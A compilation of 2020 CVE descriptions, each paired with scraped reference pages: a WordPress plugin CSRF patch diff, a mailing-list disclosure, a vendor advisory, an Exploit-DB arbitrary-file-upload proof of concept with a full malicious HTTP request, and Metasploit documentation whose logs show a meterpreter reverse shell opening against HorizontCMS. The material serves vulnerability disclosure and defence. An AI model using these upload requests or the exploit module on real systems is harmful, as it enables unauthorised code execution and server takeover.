The ultimate-category-excluder plugin before 1.2 for WordPress allows ultimate-category-excluder.php CSRF.

Timestamp:

12/08/2020 12:29:27 PM (20 months ago)

Marios Alexandrou

Message:

Addressed minor vulnerability reported by SCA AppSec.  

Location:

ultimate-category-excluder/trunk

Files:

  

*   readme.txt (1 diff)
*   ultimate-category-excluder.php (3 diffs)

**Legend:**

Unmodified

Added

Removed

*   **ultimate-category-excluder/trunk/readme.txt**
    
    r2364782
    
    r2434070
    
     
    
    32
    
    32
    
    33
    
    33
    
    \== Changelog ==
    
     
    
    34
    
     
    
    35
    
    \= 1.2 =
    
     
    
    36
    
    \* Addressed minor vulnerability reported by SCA AppSec. If concerned, review your UCE category settings to ensure they are set as expected.
    
    34
    
    37
    
    35
    
    38
    
    \= 1.1 =
    
*   **ultimate-category-excluder/trunk/ultimate-category-excluder.php**
    
    r1490271
    
    r2434070
    
     
    
    2
    
    2
    
    /\*
    
    3
    
    3
    
    Plugin Name: Ultimate Category Excluder
    
    4
    
     
    
    Version: 1.1
    
     
    
    4
    
    Version: 1.2
    
    5
    
    5
    
    Plugin URI: http://infolific.com/technology/software-worth-using/ultimate-category-excluder/
    
    6
    
    6
    
    Description: Easily exclude categories from your front page, feeds, archives, and search results.
    
    …
    
    …
    
     
    
    42
    
    42
    
    43
    
    43
    
    function ksuce\_options\_page() {
    
    44
    
     
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) { $message = ksuce\_process(); }
    
     
    
    44
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) {
    
     
    
    45
    
            check\_admin\_referer( 'uce\_form' );
    
     
    
    46
    
            $message = ksuce\_process();
    
     
    
    47
    
        }
    
    45
    
    48
    
        $options = ksuce\_get\_options();
    
    46
    
    49
    
        ?>
    
    …
    
    …
    
     
    
    50
    
    53
    
            <p><?php \_e( 'Use this page to select the categories you wish to exclude and where you would like to exclude them from.', 'UCE' ); ?></p>
    
    51
    
    54
    
            <form action="options-general.php?page=ultimate-category-excluder.php" method="post">
    
     
    
    55
    
            <?php wp\_nonce\_field( 'uce\_form' ); ?>
    
    52
    
    56
    
            <table class="widefat">
    
    53
    
    57
    
            <thead>
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2020-35135: Changeset 2434070 – WordPress Plugin Repository

SourceCodester Student Management System Project in PHP version 1.0 is vulnerable to stored a cross-site scripting (XSS) via the 'add subject' tab.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: krishna yadav <kisna1993yadav () gmail com>  
_Date_: Tue, 8 Dec 2020 10:07:53 +0530  

Dear Team,

Please find attached POC and detailed information for CVE-2020-25889 &
CVE-2020-25955.

For CVE-2020-25889:
# Exploit Title: online bus booking system project using PHP MySQL - SQL
Injection
# Exploit Author: Krishna Yadav
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10/Kali Linux

SQL Injection:
SQL Injection (SQLi) is a type of injection attack that makes it possible
to execute malicious SQL statements. These statements control a database
server behind a web application. Attackers can use SQL Injection
vulnerabilities to bypass application security measures. They can go around
authentication and authorization of a web page or web application and
retrieve the content of the entire SQL database. They can also use SQL
Injection to add, modify, and delete records in the database.

Attack Vector:
online-bus-booking-system-project-using-PHP-MySQL version 1.0 has SQL
injection at the login page. By placing SQL injection payload on the login
page attacker can bypass the authentication and can gain the admin
privilege.

Vulnerable Parameter: Login Page

==========================================================================================================================================

 For CVE-2020-25955
# Exploit Title: student management system project PHP - Stored cross-site
scripting
# Exploit Author: Krishna Yadav
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/14443/student-management-system-project-php.html
# Version: 1.0
# Tested on Windows 10/Kali Linux

Stored cross-site scripting:
Stored attacks are those where the injected script is permanently stored on
the target servers, such as in a database, in a message forum, visitor log,
comment field, etc. The victim then retrieves the malicious script from the
server when it requests the stored information. Stored XSS is also
sometimes referred to as Persistent or Type-I XSS.

Attack Vector:
student management system project version 1.0 is vulnerable to stored XSS.
Each time while editing the subjects XSS popup will reflect.

Vulnerable Parameter: Add subject tab is vulnerable to stored XSS.

NOTE: For better understanding, please look at the attached POCs for both
CVE IDs.

Kindly publish the details ASAP.

Thanks & Regards,
Krishna Yadav
Mob No. +91 8169434641

**Attachment: POC-for-CVE-2020-25889.mp4**  
_Description:_

**Attachment: POC for CVE-2020-25955.zip**  
_Description:_

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Request for full disclosure of CVE-2020-25889 & CVE-2020-25955** _krishna yadav (Dec 07)_

CVE-2020-25955: Request for full disclosure of CVE-2020-25889 & CVE-2020-25955

On Western Digital My Cloud OS 5 devices before 5.06.115, the NAS Admin dashboard has an authentication bypass vulnerability that could allow an unauthenticated user to execute privileged commands on the device.

**My Cloud OS 5 Firmware 5.06.115**

**WDC Tracking Number:** WDC-20009  
**Published:** November 23, 2020

**Last Updated:**  November 23, 2020

**Description**

My Cloud OS 5 was vulnerable to an authentication bypass vulnerability. My Cloud Firmware 5.06.115 contains updates to resolve this vulnerability and help improve the security of your My Cloud devices.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.06.115

November 19, 2020

My Cloud PR4100

5.06.115

November 19, 2020

My Cloud EX2 Ultra

5.06.115

November 19, 2020

My Cloud EX4100

5.06.115

November 19, 2020

My Cloud Mirror Gen 2

5.06.115

November 19, 2020

For more information on the latest security updates, see the release notes: https://os5releasenotes.mycloud.com/#/

**Advisory Summary**

Addressed a NAS Admin authentication bypass vulnerability that could allow an unauthenticated user to execute privileged commands on the device. The vulnerability was addressed through enhanced validation of URI paths.

**CVE Number:** CVE-2020-28940, CVE-2020-28971  
**Reported by:** Trapa Security working with Trend Micro’s Zero Day Initiative, & DEVCORE Security Team working with Trend Micro’s Zero Day Initiative

Hardened the operating system by removing an upload endpoint that could be used by an authenticated administrator to upload executable PHP scripts.

**CVE Number:** CVE-2020-28970  
**Reported by:** Sam Thomas (@\_s\_n\_t) of Pentest Ltd (@pentestltd) working with Trend Micro’s Zero Day Initiative

CVE-2020-28940: WDC-20009 OS 5 Firmware 5.06.115 | Western Digital

In cPanel before 90.0.17, 2FA can be bypassed via a brute-force approach (SEC-575).

CVE-2020-29136: 90 Change Log

An Arbitrary File Upload is discovered in SourceCodester Tourism Management System 1.0 allows the user to conduct remote code execution via admin/create-package.php vulnerable page.

    #Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
    #Date: 2020-10-19
    #Exploit Author: Ankita Pal & Saurav Shukla
    #Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
    #Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
    #Version: V1.0
    #Tested on: Windows 10 + xampp v3.2.4
    
    
    Proof of Concept:::
    
    Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    
    Step 2: Open Tour Package -> Create
    
    Malicious Request:::
    
    POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
    Host: localhost:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
    Content-Length: 1101
    Origin: http://localhost:8081
    Connection: close
    Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
    Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
    Upgrade-Insecure-Requests: 1
    
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagename"
    
    Pack1
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagetype"
    
    Family
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagelocation"
    
    Manali
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageprice"
    
    21
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagefeatures"
    
    Free
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packagedetails"
    
    Details
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="packageimage"; filename="file1.php"
    Content-Type: application/octet-stream
    
    <?php
    	phpinfo();
    ?>
    -----------------------------63824304340061635682865592713
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------63824304340061635682865592713--

CVE-2020-28136: OffSec’s Exploit Database Archive

Improper input validation in the Auto-Discovery component of Nagios XI before 5.7.5 allows an authenticated attacker to execute remote code.

CVE-2020-28648: Nagios XI Change Log - Nagios

A cross-site scripting (XSS) vulnerability exists in templates_import.php (Cacti 1.2.13) due to Improper escaping of error message during template import preview in the xml_path field

'CVE-2020-25706?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-25706: Invalid Bug ID

eth_get_gso_type in net/eth.c in QEMU 4.2.1 allows guest OS users to trigger an assertion failure. A guest can crash the QEMU process via packet data that lacks a valid Layer 3 protocol.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2020-27617: security - CVE-2020-27617 QEMU: net: an assert failure via eth_get_gso_type

An unrestricted file upload issue in HorizontCMS through 1.0.0-beta allows an authenticated remote attacker (with access to the FileManager) to upload and execute arbitrary PHP code by uploading a PHP payload, and then using the FileManager's rename function to provide the payload (which will receive a random name on the server) with the PHP extension, and finally executing the PHP file via an HTTP GET request to /storage/<php_file_name>. NOTE: the vendor has patched this while leaving the version number at 1.0.0-beta.

**About**

This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed, but not in a specific version release.

**Vulnerable system**

HorizontCMS 1.0.0-beta and prior

**Verification Steps**

1.  Install the module as usual
2.  Start msfconsole
3.  Do: use exploit/multi/http/HorizontCMS_upload_exec
4.  Do: set RHOSTS [IP]
5.  Do: set USERNAME [username for the HorizontCMS account]
6.  Do: set PASSWORD [password for the HorizontCMS account]
7.  Do: set target [target]
8.  Do: set payload [payload]
9.  Do: set LHOST [IP]
10.  Do: exploit

**Options****PASSWORD**

The password for the HorizontCMS account to authenticate with.

**TARGETURI**

The base path to HorizontCMS. The default value is /.

**USERNAME**

The username for the HorizontCMS account to authenticate with.

**Targets**

    Id  Name
    --  ----
    0   PHP
    1   Linux
    2   Windows
    

**Scenarios****HorizontCMS 1.0.0-beta running on Ubuntu 18.04) - PHP target**

    msf6 exploit(multi/http/horizontcms_upload_exec) > show options 
    Module options (exploit/multi/http/horizontcms_upload_exec):
       Name       Current Setting   Required  Description
       ----       ---------------   --------  -----------
       PASSWORD   test              yes       Password to authenticate with
       Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT      80                yes       The target port (TCP)
       SSL        false             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                 yes       The base path to HorizontCMS
       URIPATH                      no        The URI to use for this exploit (default is random)
       USERNAME   test              yes       Username to authenticate with
       VHOST      testhorizont.com  no        HTTP server virtual host
    Payload options (php/meterpreter/reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   PHP
    msf6 exploit(multi/http/horizontcms_upload_exec) > run
    [*] Started reverse TCP handler on 192.168.1.128:4444 
    [*] Executing automatic check (disable AutoCheck to override)
    [+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
    [+] Successfully authenticated to the HorizontCMS dashboard
    [*] Uploading payload as EaCPK1HSbRru.php...
    [+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
    [+] Successfully renamed payload back to EaCPK1HSbRru.php
    [*] Executing the payload...
    [*] Sending stage (39264 bytes) to 192.168.1.227
    [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
    [+] Successfully deleted EaCPK1HSbRru.php
    meterpreter > getuid
    Server username: www-data (33)
    meterpreter >
    

**HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target**

    msf6 exploit(multi/http/horizontcms_upload_exec) > run
    [*] Started reverse TCP handler on 192.168.1.128:4444 
    [*] Executing automatic check (disable AutoCheck to override)
    [+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
    [+] Successfully authenticated to the HorizontCMS dashboard
    [*] Uploading payload as W6nQKce4Uq.php...
    [+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
    [+] Successfully renamed payload back to W6nQKce4Uq.php
    [*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=<command>`
    [*] Sending stage (3008420 bytes) to 192.168.1.227
    [*] Command Stager progress - 100.00% done (897/897 bytes)
    [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
    [+] Successfully deleted W6nQKce4Uq.php
    meterpreter > getuid
    Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
    meterpreter >

CVE-2020-27387: Add HorizontCMS 1.0.0-beta exploit module and documentation by ErikWynter · Pull Request #14340 · rapid7/metasploit-framework

WordPress before 5.5.2 allows stored XSS via post slugs.

Tag

#php